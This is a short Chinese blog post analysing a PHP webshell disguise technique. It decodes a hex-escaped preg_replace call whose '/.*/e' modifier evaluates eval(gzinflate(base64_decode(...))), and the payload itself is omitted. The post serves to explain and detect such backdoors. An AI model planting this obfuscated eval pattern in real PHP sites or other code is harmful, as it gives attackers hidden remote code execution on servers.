首页 » 数据安全 » 正文

webshell 的伪装 – preg_replace /e 修饰符

发布者:站点默认
2018/01/11 浏览数(1,778) 分类:数据安全 webshell 的伪装 – preg_replace /e 修饰符已关闭评论

PHP5.5.0以下可用,5.5.0及以上版本已经被弃用了。使用 preg_replace_callback() 代替。/e 即 PREG_REPLACE_EVAL。

webshell 代码

<?php
preg_replace(
	"\x2F\x2E\x2A\x2F\x65",
	"\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'这里省略一些字符'\x29\x29\x29\x3B",
	"\x2E"
);

首先来看一下 preg_replace 的返回值:

如果subject是一个数组, preg_replace()返回一个数组, 其他情况下返回一个字符串。
如果匹配被查找到,替换后的subject被返回,其他情况下 返回没有改变的 subject。如果发生错误,返回 NULL 。

问题来了,似乎 preg_replace 是没有 echo 类似的功能的,那么它是怎么实现代码输出的呢?

看一下 preg_replace 的第一个参数:

echo "\x2F\x2E\x2A\x2F\x65";
// output: /.*/e

/e 参数的说明

如果设置了这个被弃用的 /e 修饰符, preg_replace() 在进行了对替换字符串的 后向引用替换之后, 将替换后的字符串作为php 代码评估执行(eval 函数方式),并使用执行结果 作为实际参与替换的字符串。单引号、双引号、反斜线(\)和 NULL 字符在 后向引用替换时会被用反斜线转义。

简单说意思就是:如果使用了 /e,那么第二个参数里的 php 代码可以直接执行。

看一下 preg_replace 的第二个参数:

echo "\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'这里省略一些字符'\x29\x29\x29\x3B";
// output: eval(gzinflate(base64_decode('这里省略一些字符')));

[完]

点击返回顶部
  1. 留言
  2. 联系方式